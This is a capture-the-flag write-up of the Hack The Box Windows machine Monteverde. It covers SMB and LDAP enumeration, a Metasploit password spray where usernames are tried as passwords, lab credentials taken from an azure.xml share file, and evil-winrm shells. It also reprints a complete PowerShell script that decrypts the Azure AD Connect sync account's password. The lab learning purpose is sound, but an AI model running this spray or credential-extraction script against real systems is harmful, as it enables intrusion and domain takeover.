Hack The Box Writeup: Monteverde

As the second new box in 2020, Monteverde came into play. A Medium Windows box good for 30 points for your next status on Hack The Box. Personally, I like the Windows machines better than Linux, but that’s purely because I’m more concerned with the Microsoft ecosystem. Enough general shizzle, time to discover Monteverde.

Hack The Box infocard for Monteverde
Hack The Box Monteverde

An Nmap scan a day, keeps the doctor away. First let’s see what is available on this Windows box. LDAP, SMB and WINRM are available, chances are that a large part of the enumeration can be done with them.

nmap -sC -sV -T5 -oA monteverde

Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-09 10:55 GMT
Nmap scan report for
Host is up (0.061s latency).
Not shown: 989 filtered ports
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-02-09 11:05:45Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 9m27s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-02-09T11:08:14
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 276.68 seconds

By means of enum4linux you can quickly see whether accounts can be found, what the domain is and any group memberships.

Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Feb 9 10:56:14 2020

| Target Information |
Target ...........
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

| Getting domain SID for |
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359.
Domain Name: MEGABANK
Domain Sid: S-1-5-21-391775091-850290835-3566037492
[+] Host is part of a domain (not a workgroup)

| Users on |
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
index: 0xfb6 RID: 0x450 acb: 0x00000210 Account: AAD_987d7f2f57d2 Name: AAD_987d7f2f57d2 Desc: Service account for the Synchronization Service with installation identifier 05c97990-7587-4a3d-b312-309adfc172d9 running on computer MONTEVERDE.
index: 0xfd0 RID: 0xa35 acb: 0x00000210 Account: dgalanos Name: Dimitris Galanos Desc: (null)
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0xfc3 RID: 0x641 acb: 0x00000210 Account: mhope Name: Mike Hope Desc: (null)
index: 0xfd1 RID: 0xa36 acb: 0x00000210 Account: roleary Name: Ray O'Leary Desc: (null)
index: 0xfc5 RID: 0xa2a acb: 0x00000210 Account: SABatchJobs Name: SABatchJobs Desc: (null)
index: 0xfd2 RID: 0xa37 acb: 0x00000210 Account: smorgan Name: Sally Morgan Desc: (null)
index: 0xfc6 RID: 0xa2b acb: 0x00000210 Account: svc-ata Name: svc-ata Desc: (null)
index: 0xfc7 RID: 0xa2c acb: 0x00000210 Account: svc-bexec Name: svc-bexec Desc: (null)
index: 0xfc8 RID: 0xa2d acb: 0x00000210 Account: svc-netapp Name: svc-netapp Desc: (null)

[+] Getting domain groups:
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Azure Admins] rid:[0xa29]
group:[File Server Admins] rid:[0xa2e]
group:[Call Recording Admins] rid:[0xa2f]
group:[Reception] rid:[0xa30]
group:[Operations] rid:[0xa31]
group:[Trading] rid:[0xa32]
group:[HelpDesk] rid:[0xa33]

[+] Getting domain group memberships:
Group 'Domain Guests' (RID: 514) has member: MEGABANK\Guest
Group 'HelpDesk' (RID: 2611) has member: MEGABANK\roleary
Group 'Domain Users' (RID: 513) has member: MEGABANK\Administrator
Group 'Domain Users' (RID: 513) has member: MEGABANK\krbtgt
Group 'Domain Users' (RID: 513) has member: MEGABANK\AAD_987d7f2f57d2
Group 'Domain Users' (RID: 513) has member: MEGABANK\mhope
Group 'Domain Users' (RID: 513) has member: MEGABANK\SABatchJobs
Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-ata
Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-bexec
Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-netapp
Group 'Domain Users' (RID: 513) has member: MEGABANK\dgalanos
Group 'Domain Users' (RID: 513) has member: MEGABANK\roleary
Group 'Domain Users' (RID: 513) has member: MEGABANK\smorgan
Group 'Operations' (RID: 2609) has member: MEGABANK\smorgan
Group 'Azure Admins' (RID: 2601) has member: MEGABANK\Administrator
Group 'Azure Admins' (RID: 2601) has member: MEGABANK\AAD_987d7f2f57d2
Group 'Azure Admins' (RID: 2601) has member: MEGABANK\mhope
Group 'Trading' (RID: 2610) has member: MEGABANK\dgalanos
Group 'Group Policy Creator Owners' (RID: 520) has member: MEGABANK\Administrator
group:[Developers] rid:[0xa34]

The output returns a number of usernames but no further hints to passwords. I create a text file with the usernames to quickly see whether accounts can be logged in by means of the SMB_Login module in Metasploit.

                                   ___          ____
                               ,-""   `.      < HONK >
                             ,'  _   e )`-._ /  ----
                            /  ,' `-._<.===-'
                           /  /
                          /  ;
              _          /   ;
 (`._    _.-"" ""--..__,'    |
 <_  `-""                     \
  <`-                          :
   (__   <__.                  ;
     `-.   '-.__.      _.'    /
        \      `-.__,-'    _,'
         `._    ,    /__,-'
            ""._\__,'< <____
                 | |  `----.`.
                 | |        \ `.
                 ; |___      \-``
                 \   --<

       =[ metasploit v5.0.72-dev                          ]
+ -- --=[ 1963 exploits - 1095 auxiliary - 336 post       ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                 

First, I try to use the USER_AS_PASS option . This option ensures that the username is used as password for all users in my user list. A quick way to see if a lazy administrator has been working.

msf5 auxiliary(scanner/smb/smb_login) > set RHOSTS
msf5 auxiliary(scanner/smb/smb_login) > set SMBDomain MEGABANK
msf5 auxiliary(scanner/smb/smb_login) > set USER_FILE /home/user/Documents/boxes/monteverde/userlist.txt
USER_FILE => /home/user/Documents/boxes/monteverde/userlist.txt

msf5 auxiliary(scanner/smb/smb_login) > set STOP_ON_SUCCESS true
msf5 auxiliary(scanner/smb/smb_login) > set USER_AS_PASS true 
USER_AS_PASS => true

msf5 auxiliary(scanner/smb/smb_login) > run

Failed, Failed, Failed, Success! It looks like the password of SABatchJobs is simply: SABatchJobs.

[*] - - Starting SMB login bruteforce
[-] - - Failed: 'MEGABANK\dgalanos:dgalanos',
[-] - - Failed: 'MEGABANK\Guest:Guest',
[-] - - Failed: 'MEGABANK\mhope:mhope',
[-] - - Failed: 'MEGABANK\roleary:roleary',
[+] - - Success: 'MEGABANK\SABatchJobs:SABatchJobs'
[*] - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

[0x3] Path to User flag

The account cannot connect via Windows Remote Management. First, browse through SMB based on the SABatchJobs password found.

smbclient -U SABatchJobs -L
Enter WORKGROUP\SABatchJobs's password:

 Sharename Type Comment
 --------- ---- -------
 ADMIN$ Disk Remote Admin
 azure_uploads Disk
 C$ Disk Default share
 E$ Disk Default share
 IPC$ IPC Remote IPC
 NETLOGON Disk Logon server share
 SYSVOL Disk Logon server share
 users$ Disk

The users $ share contains a number of directories that I cannot access with these credentials. The only file visible is azure.xml .

smbclient \\\\monteverde\\users$ -U SABatchJobs
Enter WORKGROUP\SABatchJobs's password:

Try "help" to get a list of possible commands.
smb: \> recurse
smb: \> dir
  . D 0 Fri Jan 3 13:12:48 2020
  .. D 0 Fri Jan 3 13:12:48 2020
  dgalanos D 0 Fri Jan 3 13:12:30 2020
  mhope D 0 Fri Jan 3 13:41:18 2020
  roleary D 0 Fri Jan 3 13:10:30 2020
  smorgan D 0 Fri Jan 3 13:10:24 2020

  . D 0 Fri Jan 3 13:12:30 2020
  .. D 0 Fri Jan 3 13:12:30 2020

  . D 0 Fri Jan 3 13:41:18 2020
  .. D 0 Fri Jan 3 13:41:18 2020
  azure.xml AR 1212 Fri Jan 3 13:40:23 2020

  . D 0 Fri Jan 3 13:10:30 2020
  .. D 0 Fri Jan 3 13:10:30 2020

  . D 0 Fri Jan 3 13:10:24 2020
  .. D 0 Fri Jan 3 13:10:24 2020

  524031 blocks of size 4096. 518419 blocks available

A config file for Azure, but otherwise I don’t expect to need much of this in terms of code. What is interesting is the Password. Since this file is in mhope ‘s directory , this may be his password.

<Objs Version="" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">4n0therD4y@n0th3r$</S>

After the first user I now have a set of credentials for mhope . I expect to now also have the user flag.

evil-winrm -i monteverde -u "megabank\mhope" -p "4n0therD4y@n0th3r$"

Evil-WinRM shell v2.0
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\mhope\Documents>
*Evil-WinRM* PS C:\Users\mhope\Desktop> dir

    Directory: C:\Users\mhope\Desktop

Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 1/3/2020 5:48 AM 32 user.txt

User flag is in. Now continue to search for an option to find root.

*Evil-WinRM* PS C:\Users\mhope\Desktop> cat user.txt

[0x4] Path too Root flag

The machine is fairly bare and there is little of interest to browse through. In C: \ Program Files you can see that this machine is equipped with Azure AD Connect, a piece of tooling for synchronizing your on-premise Active Directory to Azure Active Directory. I do not expect this on an HTB box without it having a purpose. Will this be root?

*Evil-WinRM* PS C:\Program Files> dir

    Directory: C:\Program Files

Mode                LastWriteTime         Length Name                                                                                                                                                                                                    
----                -------------         ------ ----                                                                                                                                                                                                    
d-----         1/2/2020   9:36 PM                Common Files                                                                                                                                                                                            
d-----         1/2/2020   2:46 PM                internet explorer                                                                                                                                                                                       
d-----         1/2/2020   2:38 PM                Microsoft Analysis Services                                                                                                                                                                             
d-----         1/2/2020   2:51 PM                Microsoft Azure Active Directory Connect                                                                                                                                                                
d-----         1/2/2020   3:37 PM                Microsoft Azure Active Directory Connect Upgrader                                                                                                                                                       
d-----         1/2/2020   3:02 PM                Microsoft Azure AD Connect Health Sync Agent                                                                                                                                                            
d-----         1/2/2020   2:53 PM                Microsoft Azure AD Sync                                                                                                                                                                                 
d-----         1/2/2020   2:31 PM                Microsoft SQL Server                                                                                                                                                                                    
d-----         1/2/2020   2:25 PM                Microsoft Visual Studio 10.0                        

After some searching on Google I find an article about Azure AD Connect for Red Teamers. The article explains how to use a Powershell script to dump the username and password of the user with which Azure AD Sync is running. The script is on the website, however, it does not work directly on this box.

After some errors about not being able to connect, I made some adjustments in the script. On the machine I found the folder C: \ Program Files \ Microsoft SQL Server \ mssql14.mssqlserver which explains why it is not working. The connection string in the original script does not work with this version of MSSQL, because MSSQL14 = Microsoft SQL Server 2017.

I have adapted the line below so that the string works with the version of MSSQL that is installed on Monteverde.

$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync;Initial Catalog=ADSync"

See here, a working script for dumping Azure AD Sync credentials. As you can see at $ client, the string is different from the original from XPN InfoSec’s blog.

# Azure-ADConnect-CredentialExtract.ps1
# Original author: Azure AD Connect for Red Teamers (XPN Adam Chester)
# Changes: adjusted  $client string for MSSQL 2017.

$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Server=localhost;Database=ADSync;Initial Catalog=ADSync;Trusted_Connection =yes;"

$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$key_id = $reader.GetInt32(0)
$instance_id = $reader.GetGuid(1)
$entropy = $reader.GetGuid(2)
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$config = $reader.GetString(0)
$crypted = $reader.GetString(1)
add-type -path "C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll"
$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager
$km.LoadKeySet($entropy, $instance_id, $key_id)
$key = $null
$key2 = $null
$km.GetKey(1, [ref]$key2)
$decrypted = $null
$key2.DecryptBase64ToString($crypted, [ref]$decrypted)
$domain = select-xml -Content $config -XPath "//parameter[@name='forest-login-domain']" | select @{Name = 'Domain'; Expression = {$_.node.InnerXML}}
$username = select-xml -Content $config -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerXML}}
$password = select-xml -Content $decrypted -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerXML}}
Write-Host ("[+] Domain: " + $domain.Domain)
Write-Host ("[+] Username: " + $username.Username)
Write-Host ("[+]Password: " + $password.Password)

I modified and saved the script locally on my laptop. Via upload within the WIN-RM shell you can easily upload it to the remote box.

*Evil-WinRM* PS C:\users\mhope\Videos> upload Azure-ADConnect-CredentialExtract.ps1

Info: Uploading Azure-ADConnect-CredentialExtract.ps1  to C:\users\mhope\Videos\ad2.ps1
Data: 2288 bytes of 2288 bytes copied

Info: Upload successful!

And there you have it! In this case, the Administrator account was used for Azure AD Sync.

*Evil-WinRM* PS C:\users\mhope\Videos> powershell ./Azure-ADConnect-CredentialExtract.ps1

[+] Username: administrator
[+]Password: d0m@in4dminyeah!

Through Evil-WinRM I can log in with the newly acquired Administrator credentials.

evil-winrm -i monteverde -u "megabank\Administrator" -p "d0m@in4dminyeah!"

Evil-WinRM shell v2.0
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> 

As the last step of this box, I take the root flag. With this, Monteverde is officially rooted!

cat c:\Users\Administrator\Desktop\root.txt 


Ethical Hacker | Cybersecurity enthusiast | Always looking to expand my knowledge | got root?

Add comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Your Header Sidebar area is currently empty. Hurry up and add some widgets.